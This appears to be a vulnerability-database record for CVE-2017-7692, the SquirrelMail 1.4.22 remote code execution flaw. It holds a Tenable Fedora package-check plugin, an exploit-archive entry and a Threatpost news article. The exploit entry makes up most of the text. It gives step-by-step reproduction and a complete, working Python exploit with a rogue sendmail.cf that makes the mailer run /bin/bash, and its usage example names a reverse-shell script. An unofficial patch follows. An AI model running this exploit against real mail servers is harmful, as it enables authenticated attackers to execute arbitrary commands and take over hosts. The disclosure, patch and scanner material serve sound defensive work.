(C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0b6da97aa5.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100603);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"FEDORA\", value:\"2017-0b6da97aa5\");\n\n script_name(english:\"Fedora 24 : squirrelmail (2017-0b6da97aa5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0b6da97aa5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squirrelmail package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"squirrelmail-1.4.22-19.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squirrelmail\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-19T03:08:01", "description": "Exploit for linux platform in category remote exploits", "edition": 1, "published": "2017-04-20T00:00:00", "type": "zdt", "title": "Squirrelmail 1.4.22 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7692"], "modified": "2017-04-20T00:00:00", "href": "https://0day.today/exploit/description/27626", "id": "1337DAY-ID-27626", "sourceData": "Title: Squirrelmail Remote Code Execution\r\nProduct: Squirrelmail\r\nVersion: 1.4.22 and probably prior\r\nVendor: squirrelmail.org\r\nType: Command Injection\r\nRisk level: 4 / 5\r\nCredit: [email\u00a0protected]\r\nCVE: CVE-2017-7692\r\nVendor notification: 2017-04-04\r\nVendor fix: N/A\r\nPublic disclosure: 2017-04-19\r\n\r\n\r\n\r\n\r\nDETAILS\r\n\r\nSquirrelmail version 1.4.22 (and probably prior) is vulnerable to a remote code execution vulnerability because\r\nit fails to sanitize a string before passing it to a popen call. 
It's possible to exploit this vulnerability to \r\nexecute arbitrary shell commands on the remote server.\r\n\r\nThe problem is in Deliver_SendMail.class.php, in the initStream function, which uses escapeshellcmd() to sanitize the \r\nsendmail command before executing it. The use of escapeshellcmd() is not correct in this case since it does not \r\nescape whitespace: the shell still splits the escaped string into separate arguments, allowing the injection of arbitrary command-line parameters.\r\n\r\n $this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \r\n $stream = popen(escapeshellcmd($this->sendmail_command), \"w\");\r\n\r\n\r\nThe $envelopefrom variable is controlled by the attacker, hence it's possible to trick sendmail into using an \r\nattacker-provided configuration file that triggers the execution of an arbitrary command.\r\n\r\nIn order to exploit this vulnerability the MTA in use must be sendmail and Squirrelmail must be configured\r\nto use it as commandline (useSendmail directive of the config file set to true).\r\nAlso, the edit_identity directive of the config file must be set to true, but this is the default configuration.\r\nFinally, the attacker needs valid user credentials and must know the path of the SquirrelMail attachment directory\r\n(/var/local/squirrelmail/attach/ in the example below), since the injected -C option has to point at the uploaded file.\r\n\r\nTo reproduce the issue follow these steps:\r\n 1. Create a rogue sendmail.cf that triggers the execution of /usr/bin/touch:\r\n [...]\r\n Mlocal, P=/usr/bin/touch, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n T=DNS/RFC822/X-Unix,\r\n A=X /tmp/executed\r\n 2. Upload it as a mail attachment and get its remote name (ex: lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD)\r\n 3. Go to Options -> Personal Informations and set the following payload as Email Address:\r\n <[email\u00a0protected] -OQueueDirectory=/tmp -C /var/local/squirrelmail/attach/lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD>\r\n 4. Send an email\r\n 5. 
Verify the execution of the command with \"ls /tmp/executed\" on the remote server\r\n\r\n\r\n\r\n\r\nPROOF OF CONCEPT\r\n\r\nThe followig python script exploits this vulnerability to execute an attacker provided bash script on the remote server.\r\n\r\nBOF\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n\r\n\"\"\"\r\n\r\nSquirrelMail 1.4.22 Remote Code Execution (authenticated) \r\nExploit code for CVE-2017-7692\r\n[email\u00a0protected]\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import unicode_literals\r\nimport sys\r\nimport os\r\nimport re\r\nimport requests\r\n\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\n\r\n\r\nSENDMAILCF=\"/tmp/squirrelmail1_4_22-sendmailcf-rce\"\r\nCOMPOSE = \"/src/compose.php\"\r\nINFOS = \"/src/options.php?optpage=personal\"\r\nSQM_ATTACH_PATH = \"/var/local/squirrelmail/attach/\"\r\n# must be enclosed in <> otherwise spaces will be removed ..\r\nSENDER = \"<[email\u00a0protected] -OQueueDirectory=/tmp -C %s%s>\"\r\n\r\n\r\nSESSID = \"\"\r\nBASEURL = \"\"\r\n\r\n\r\ndef attach(attachment):\r\n url = \"%s%s\" % (BASEURL, COMPOSE)\r\n token = get_csrf_token(url)\r\n\r\n values = {\r\n \"smtoken\": token,\r\n \"attach\": \"add\"\r\n }\r\n\r\n try:\r\n files = {'attachfile': open(attachment,'rb')}\r\n resp = requests.post(url, files=files, data=values, cookies={'SQMSESSID':SESSID})\r\n fname = re.search(r'att_local_name\";s:[0-9]+:\"([a-zA-Z0-9]+)\"', resp.text)\r\n if not fname:\r\n print \"\\nError: unable to upload file %s\" % attachment\r\n return fname.group(1)\r\n\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef send():\r\n url = \"%s%s\" % (BASEURL, COMPOSE)\r\n token = get_csrf_token(url)\r\n\r\n values = {\r\n \"smtoken\": token,\r\n \"send_to\": \"root\",\r\n \"send\": \"Send\"\r\n }\r\n\r\n try:\r\n resp = requests.post(url, data=values, cookies={'SQMSESSID':SESSID})\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef set_identity(sender):\r\n 
url = \"%s%s\" % (BASEURL, INFOS)\r\n token = get_csrf_token(url)\r\n values = {\r\n \"smtoken\": token,\r\n \"optpage\": \"personal\",\r\n \"optmode\": \"submit\",\r\n \"new_email_address\": sender,\r\n \"submit_personal\": \"Submit\"\r\n }\r\n\r\n try:\r\n requests.post(url, data=values, cookies={'SQMSESSID':SESSID})\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef get_csrf_token(url):\r\n try:\r\n body = requests.get(url, cookies={'SQMSESSID':SESSID}).text\r\n inp = re.search(r'<input.*name=\"smtoken\".*>', body, re.MULTILINE)\r\n token = re.search(r'value=\"([a-zA-Z0-9]+)\"', inp.group(0))\r\n if token:\r\n return token.group(1)\r\n except Exception as e:\r\n pass\r\n\r\n print \"\\nUnable to get CSRF token\"\r\n sys.exit(1)\r\n\r\ndef outw(s):\r\n sys.stdout.write(s)\r\n sys.stdout.flush()\r\n\r\ndef main(argv):\r\n global BASEURL\r\n global SESSID\r\n\r\n if len(argv) != 4:\r\n print (\r\n \"SquirrelMail 1.4.22 Remote Code Execution (authenticated) - [email\u00a0protected]\\n\"\r\n \"The target server must use sendmail and squirrelmail must be configured to use /usr/bin/sendmail\\n\"\r\n \"Usage:\\n\"\r\n \" %s <url> <session_id> <script>\\n\"\r\n \" url: the url of squirrelmail\\n\"\r\n \" session_id: the value of SQMSESSID cookie\\n\"\r\n \" script: the path to the bash script to be executed on the target\\n\"\r\n \"Example:\\n\"\r\n \" %s http:/example.com/squirrelmail/ l2rapvcovsui1on0b4i5boev24 reverseshell.sh\"\r\n ) % (argv[0], argv[0])\r\n\r\n sys.exit(1)\r\n\r\n BASEURL = argv[1]\r\n SESSID = argv[2]\r\n script = argv[3]\r\n\r\n outw(\"Uploading script ... \")\r\n script_fname = attach(script)\r\n print \"ok\"\r\n\r\n\r\n outw(\"Generating sendmail.cf ... 
\")\r\n try:\r\n script_path = \"%s%s\" % (SQM_ATTACH_PATH, script_fname)\r\n with open(SENDMAILCF, 'w') as f:\r\n f.write(SENDMAILCF_CONTENT % script_path)\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n print \"ok\"\r\n\r\n outw(\"Uploading sendmail.cf ... \")\r\n smc_fname = attach(SENDMAILCF)\r\n os.remove(SENDMAILCF)\r\n print \"ok\"\r\n\r\n outw(\"Updating user options ... \")\r\n sender = SENDER % (SQM_ATTACH_PATH, smc_fname)\r\n set_identity(sender)\r\n print \"ok\"\r\n\r\n outw(\"Checking identity field ... \")\r\n icheck = requests.get(\"%s%s\" % (BASEURL, INFOS), cookies={'SQMSESSID':SESSID}).text\r\n if not smc_fname in icheck:\r\n print \"\\nError: unable to set identity field .. maybe squirrelmail is configured with edit_identity=false\"\r\n sys.exit(1)\r\n print \"ok\"\r\n\r\n outw(\"Executing script ... \")\r\n send()\r\n print \"ok\\n\"\r\n sys.exit(0)\r\n\r\nSENDMAILCF_CONTENT = \"\"\"\r\nO DontBlameSendmail=,AssumeSafeChown,ForwardFileInGroupWritableDirPath,GroupWritableForwardFileSafe,GroupWritableIncludeFileSafe,IncludeFileInGroupWritableDirPath,DontWarnForwardFileInUnsafeDirPath,TrustStickyBit,NonRootSafeAddr,GroupWritableIncludeFile,GroupReadableDefaultAuthInfoFile\r\nKdequote dequote\r\nScanonify=3\r\n[email\u00a0protected] [email\u00a0protected] <@>\r\nR$* $: $1 <@> mark addresses\r\nR$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>\r\n[email\u00a0protected] $* <@> $: @ $1 unmark @host:...\r\nR$* [ IPv6 : $+ ] <@> $: $1 [ IPv6 : $2 ] unmark IPv6 addr\r\nR$* :: $* <@> $: $1 :: $2 unmark node::addr\r\nR:include: $* <@> $: :include: $1 unmark :include:...\r\nR$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon\r\nR$* : $* <@> $: $2 strip colon if marked\r\nR$* <@> $: $1 unmark\r\nR$* ; $1 strip trailing semi\r\nR$* < $+ :; > $* [email\u00a0protected] $2 :; <@> catch <list:;>\r\nR$* < $* ; > $1 < $2 > bogus bracketed semi\r\n[email\u00a0protected] [email\u00a0protected] :; <@>\r\nR$* $: < $1 > housekeeping 
<>\r\nR$+ < $* > < $2 > strip excess on left\r\nR< $* > $+ < $1 > strip excess on right\r\nR<> [email\u00a0protected] < @ > MAIL FROM:<> case\r\nR< $+ > $: $1 remove housekeeping <>\r\n[email\u00a0protected] $+ , $+ $2\r\n[email\u00a0protected] [ $* ] : $+ $2\r\n[email\u00a0protected] $+ : $+ $2\r\nR $+ : $* ; @ $+ [email\u00a0protected] $>Canonify2 $1 : $2 ; < @ $3 > list syntax\r\nR $+ : $* ; [email\u00a0protected] $1 : $2; list syntax\r\nR$+ @ $+ $: $1 < @ $2 > focus on domain\r\nR$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right\r\nR$+ < @ $+ > [email\u00a0protected] $>Canonify2 $1 < @ $2 > already canonical\r\nR$- ! $+ [email\u00a0protected] $>Canonify2 $2 < @ $1 .UUCP > resolve uucp names\r\nR$+ . $- ! $+ [email\u00a0protected] $>Canonify2 $3 < @ $1 . $2 > domain uucps\r\nR$+ ! $+ [email\u00a0protected] $>Canonify2 $2 < @ $1 .UUCP > uucp subdomains\r\nR$* %% $* $1 @ $2 First make them all @s.\r\nR$* @ $* @ $* $1 %% $2 @ $3 Undo all but the last.\r\nR$* @ $* [email\u00a0protected] $>Canonify2 $1 < @ $2 > Insert < > and finish\r\nR$* [email\u00a0protected] $>Canonify2 $1\r\nSCanonify2=96\r\nR$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all\r\nR$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain\r\nR$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain\r\nR$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [addr]\r\nR$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal\r\nR$* < @@ $+ > $* [email\u00a0protected] $1 < @ $2 > $3 canon IP addr\r\nSfinal=4\r\nR$+ :; <@> [email\u00a0protected] $1 : handle <list:;>\r\nR$* <@> [email\u00a0protected] handle <> and list:;\r\nR$* < @ $+ . > $* $1 < @ $2 > $3\r\nR$* < @ *LOCAL* > $* $1 < @ $j > $2\r\nR$* < $+ > $* $1 $2 $3 defocus\r\n[email\u00a0protected] $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical\r\n[email\u00a0protected] $* [email\u00a0protected] @ $1 ... and exit\r\nR$+ @ $- . 
UUCP $2!$1 [email\u00a0protected] => h!u\r\nR$+ %% $=w @ $=w $1 @ $2 u%%[email\u00a0protected] => [email\u00a0protected]\r\nSRecurse=97\r\nR$* $: $>canonify $1\r\nR$* [email\u00a0protected] $>parse $1\r\nSparse=0\r\nR$* $: $>Parse0 $1 initial parsing\r\nR<@> $#local $: <@> special case error msgs\r\nR$* $: $>ParseLocal $1 handle local hacks\r\nR$* $: $>Parse1 $1 final parsing\r\nSParse0\r\nR<@> [email\u00a0protected] <@> special case error msgs\r\nR$* : $* ; <@> $#error [email\u00a0protected] 5.1.3 $: \"553 List:; syntax illegal for recipient addresses\"\r\n[email\u00a0protected] <@ $* > < @ $1 > catch \"@@host\" bogosity\r\nR<@ $+> $#error [email\u00a0protected] 5.1.3 $: \"553 User address required\"\r\nR$+ <@> $#error [email\u00a0protected] 5.1.3 $: \"553 Hostname required\"\r\nR$* $: <> $1\r\nR<> $* < @ [ $* ] : $+ > $* $1 < @ [ $2 ] : $3 > $4\r\nR<> $* < @ [ $* ] , $+ > $* $1 < @ [ $2 ] , $3 > $4\r\nR<> $* < @ [ $* ] $+ > $* $#error [email\u00a0protected] 5.1.2 $: \"553 Invalid address\"\r\nR<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3\r\nR<> $* <$* : $* > $* $#error [email\u00a0protected] 5.1.3 $: \"553 Colon illegal in host name part\"\r\nR<> $* $1\r\nR$* < @ . $* > $* $#error [email\u00a0protected] 5.1.2 $: \"553 Invalid host name\"\r\nR$* < @ $* .. $* > $* $#error [email\u00a0protected] 5.1.2 $: \"553 Invalid host name\"\r\nR$* < @ $* @ > $* $#error [email\u00a0protected] 5.1.2 $: \"553 Invalid route address\"\r\nR$* @ $* < @ $* > $* $#error [email\u00a0protected] 5.1.3 $: \"553 Invalid route address\"\r\nR$* , $~O $* $#error [email\u00a0protected] 5.1.3 $: \"553 Invalid route address\"\r\nR$* < @ > $* [email\u00a0protected] $>Parse0 $>canonify $1 [email\u00a0protected] => user\r\nR< @ $=w . > : $* [email\u00a0protected] $>Parse0 $>canonify $2 @here:... -> ...\r\nR$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote \"foo\"@here\r\nR< @ $+ > $#error [email\u00a0protected] 5.1.3 $: \"553 User address required\"\r\nR$* $=O $* < @ $=w . 
> [email\u00a0protected] $>Parse0 $>canonify $1 $2 $3 [email\u00a0protected] -> ...\r\nR$- $: $(dequote $1 $) < @ *LOCAL* > dequote \"foo\"\r\nR< @ *LOCAL* > $#error [email\u00a0protected] 5.1.3 $: \"553 User address required\"\r\nR$* $=O $* < @ *LOCAL* >\r\n [email\u00a0protected] $>Parse0 $>canonify $1 $2 $3 [email\u00a0protected]*LOCAL* -> ...\r\nR$* < @ *LOCAL* > $: $1\r\nSParse1\r\nR$* < @ [ $+ ] > $* $: $>ParseLocal $1 < @ [ $2 ] > $3 numeric internet spec\r\nR$* < @ [ $+ ] > $* $: $1 < @ [ $2 ] : $S > $3 Add smart host to path\r\nR$* < @ [ $+ ] : > $* $#esmtp [email\u00a0protected] [$2] $: $1 < @ [$2] > $3 no smarthost: send\r\nR$* < @ [ $+ ] : $- : $*> $* $#$3 [email\u00a0protected] $4 $: $1 < @ [$2] > $5 smarthost with mailer\r\nR$* < @ [ $+ ] : $+ > $* $#esmtp [email\u00a0protected] $3 $: $1 < @ [$2] > $4 smarthost without mailer\r\nR$=L < @ $=w . > $#local $: @ $1 special local names\r\nR$+ < @ $=w . > $#local $: $1 regular local name\r\nR$* < @ $* > $* $: $>MailerToTriple < $S > $1 < @ $2 > $3 glue on smarthost name\r\nR$* < @$* > $* $#esmtp [email\u00a0protected] $2 $: $1 < @ $2 > $3 [email\u00a0protected]\r\nR$=L $#local $: @ $1 special local names\r\nR$+ $#local $: $1 regular local names\r\nSLocal_localaddr\r\nSlocaladdr=5\r\nR$+ $: $1 $| $>\"Local_localaddr\" $1\r\nR$+ $| $#ok [email\u00a0protected] $1 no change\r\nR$+ $| $#$* $#$2\r\nR$+ $| $* $: $1\r\nR$+ + * $#local [email\u00a0protected] $&h $: $1\r\nR$+ + $* $#local [email\u00a0protected] + $2 $: $1 + *\r\nR$+ $: <> $1\r\nR< > $+ $: < > < $1 <> $&h > nope, restore +detail\r\nR< > < $+ <> + $* > $: < > < $1 + $2 > check whether +detail\r\nR< > < $+ <> $* > $: < > < $1 > else discard\r\nR< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part\r\nR< > < $+ > + $* $#local [email\u00a0protected] $2 $: @ $1 strip the extra +\r\nR< > < $+ > [email\u00a0protected] $1 no +detail\r\nR$+ $: $1 <> $&h add +detail back in\r\nR$+ <> + $* $: $1 + $2 check whether +detail\r\nR$+ <> $* $: $1 else discard\r\nR< 
local : $* > $* $: $>MailerToTriple < local : $1 > $2 no host extension\r\nR< error : $* > $* $: $>MailerToTriple < error : $1 > $2 no host extension\r\nR< $~[ : $+ > $+ $: $>MailerToTriple < $1 : $2 > $3 < @ $2 >\r\nR< $+ > $+ [email\u00a0protected] $>MailerToTriple < $1 > $2 < @ $1 >\r\nSParseLocal=98\r\nSEnvFromL\r\nR<@> $n errors to mailer-daemon\r\n[email\u00a0protected] <@ $*> $n temporarily bypass Sun bogosity\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqEnv $1 do masquerading\r\nSEnvToL\r\nR$+ < @ $* > $: $1 strip host part\r\nR$+ + $* $: < $&{addr_type} > $1 + $2 mark with addr type\r\nR<e s> $+ + $* $: $1 remove +detail for sender\r\nR< $* > $+ $: $2 else remove mark\r\nSHdrFromL\r\nR<@> $n errors to mailer-daemon\r\n[email\u00a0protected] <@ $*> $n temporarily bypass Sun bogosity\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqHdr $1 do masquerading\r\nSHdrToL\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqHdr $1 do all-masquerading\r\nSAddDomain\r\nR$* < @ $* > $* [email\u00a0protected] $1 < @ $2 > $3 already fully qualified\r\nR$+ [email\u00a0protected] $1 < @ *LOCAL* > add local qualification\r\nMlocal, P=/bin/bash, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n T=DNS/RFC822/X-Unix,\r\n A=X %s\r\nMprog, P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, D=$z:/,\r\n T=X-Unix/X-Unix/X-Unix,\r\n A=sh -c $u\r\n\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)\r\n\r\nEOF\r\n\r\n\r\n\r\n\r\nSOLUTION\r\n\r\nSince the vendor did not respond to our mails, no official fix is available. 
\r\nHowever, the following unofficial patch can be used to fix this vulnerability.\r\n\r\nBOF\r\ndiff -ruN squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php\r\n--- squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php 2011-01-06 02:44:03.000000000 +0000\r\n+++ squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php 2017-04-18 11:42:26.505181944 +0000\r\n@@ -93,9 +93,9 @@\r\n $envelopefrom = trim($from->mailbox.'@'.$from->host);\r\n $envelopefrom = str_replace(array(\"\\0\",\"\\n\"),array('',''),$envelopefrom);\r\n // save executed command for future reference\r\n- $this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\";\r\n+ $this->sendmail_command = escapeshellcmd(\"$sendmail_path $this->sendmail_args -f\") . escapeshellarg($envelopefrom);\r\n // open process handle for writing\r\n- $stream = popen(escapeshellcmd($this->sendmail_command), \"w\");\r\n+ $stream = popen($this->sendmail_command, \"w\");\r\n return $stream;\r\n }\r\nEOF\r\n\r\n\r\n\r\n\r\nREFERENCES\r\n\r\nhttps://squirrelmail.org/\r\nhttps://www.wearesegment.com/research/Squirrelmail-Remote-Code-Execution.html\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/27626", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-5181", "CVE-2017-7692"], "description": "Developers behind the PHP-based webmail package SquirrelMail patched a remote code execution vulnerability that could let attackers execute arbitrary commands on the target and compromise the system on Thursday.\n\nDawid Golunski, a researcher with [Legal Hackers](<https://legalhackers.com/>) discovered the vulnerability and reported it to the project\u2019s maintainers in January. 
The researcher has previously uncovered similar remote code execution issues in the email libraries [PHPMailer and SwiftMailer](<https://threatpost.com/phpmailer-swiftmailer-updates-resolve-critical-remote-code-execution-vulnerabilities/122795/>).\n\nDevelopers behind the webmail package had been informed of the vulnerability but it wasn\u2019t clear if it was going to get fixed until a patch arrived yesterday.\n\nGolunski told Threatpost on Thursday that squirrelmail-20170427_0200-SVN.stable includes a patch for the vulnerability.\n\nIn [a description of the bug](<https://squirrelmail.org/security/issue/2017-04-24>) on the package\u2019s site, SquirrelMail confirmed that some builds were vulnerable to a \u201ccommand-line argument injection exploit that could allow arbitrary code execution if $edit_identity and $useSendmail are enabled and user has knowledge of the location and permissions on the SquirrelMail attachment directory.\u201d\n\nThe researcher, who disclosed the vulnerability in [a write-up on his site last Friday](<https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html>), said it stemmed from insufficient escaping of user-supplied data when the package is configured with Sendmail as its main transport.\n\n> [Advisory] SquirrelMail <=1.4.22 Auth. 
Remote Code Exec[#exploit](<https://twitter.com/hashtag/exploit?src=hash>) [#0day](<https://twitter.com/hashtag/0day?src=hash>) [#cybersecurity](<https://twitter.com/hashtag/cybersecurity?src=hash>) [#infosec](<https://twitter.com/hashtag/infosec?src=hash>) [#vuln](<https://twitter.com/hashtag/vuln?src=hash>) [#hacking](<https://twitter.com/hashtag/hacking?src=hash>) [#rce](<https://twitter.com/hashtag/rce?src=hash>)<https://t.co/nqZgfrXlQB>\n> \n> \u2014 Dawid Golunski (@dawid_golunski) [April 23, 2017](<https://twitter.com/dawid_golunski/status/856217327091822593>)\n\nSendmail, perhaps the most popular mail transfer agent, often comes configured as default on email environments.\n\nThe researcher said that when it uses Sendmail, SquirrelMail failed to take into account a character (whitespace in the user-supplied envelope sender address) that can be used by attackers to inject additional command-line parameters. In a proof of concept built by Golunski, he shows how an attacker can first upload a malicious Sendmail configuration file as an attachment and then inject parameters (such as -C) that point Sendmail at that file, which leads to arbitrary command execution.\n\nGolunski documented the vulnerability in a video published earlier this week:\n\nThe proof of concept contains payloads for two vectors, file write and remote code execution. It requires valid user credentials and that SquirrelMail uses Sendmail as its delivery transport.\n\nGolunski was prompted to release his advisory last week after Filippo Cavallarin, the CEO of Segment, an Italian security firm, disclosed the same issue via the [Full Disclosure](<http://seclists.org/fulldisclosure/2017/Apr/81>) mailing list.\n\nCavallarin said he elected to disclose the vulnerability after he failed to make contact with the project\u2019s maintainers. 
Golunski said he did manage to make contact and that a CVE (CVE-2017-5181; the advisories and distribution fixes referenced on this page track the issue as CVE-2017-7692) was assigned to the vulnerability, but that the developers behind the package, citing personal issues, requested some time to patch.\n\nThe most recent version, 1.4.22, and prior versions of the package were believed to be vulnerable. Since it\u2019s an open source project and version 1.4.22 was released nearly six years ago, in July 2011, it wasn\u2019t entirely clear whether a patch was coming.\n\nUntil a patch was pushed, Golunski was encouraging users of the package to switch SquirrelMail\u2019s delivery transport from the Sendmail command-line method to SMTP (i.e. disable $useSendmail), which avoids the vulnerable code path; per the project\u2019s own description of the bug, the issue is only exploitable when both $edit_identity and $useSendmail are enabled. Cavallarin shared an unofficial patch to fix the vulnerability in his disclosure.\n\nOn Monday Golunski said that he had notified the project that both his and Cavallarin\u2019s disclosures had gone live but hadn\u2019t received a response back yet.\n\n_This article was updated throughout on April 28 to include news on squirrelmail-20170427_0200-SVN.stable and the patch._\n", "modified": "2017-04-28T17:58:56", "published": "2017-04-24T13:52:44", "id": "THREATPOST:0F388C5119C618F2D1F264ECDB1BD186", "href": "https://threatpost.com/no-fix-for-squirrelmail-remote-code-execution-vulnerability/125151/", "type": "threatpost", "title": "SquirrelMail Remote Code Execution Vulnerability Patched", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}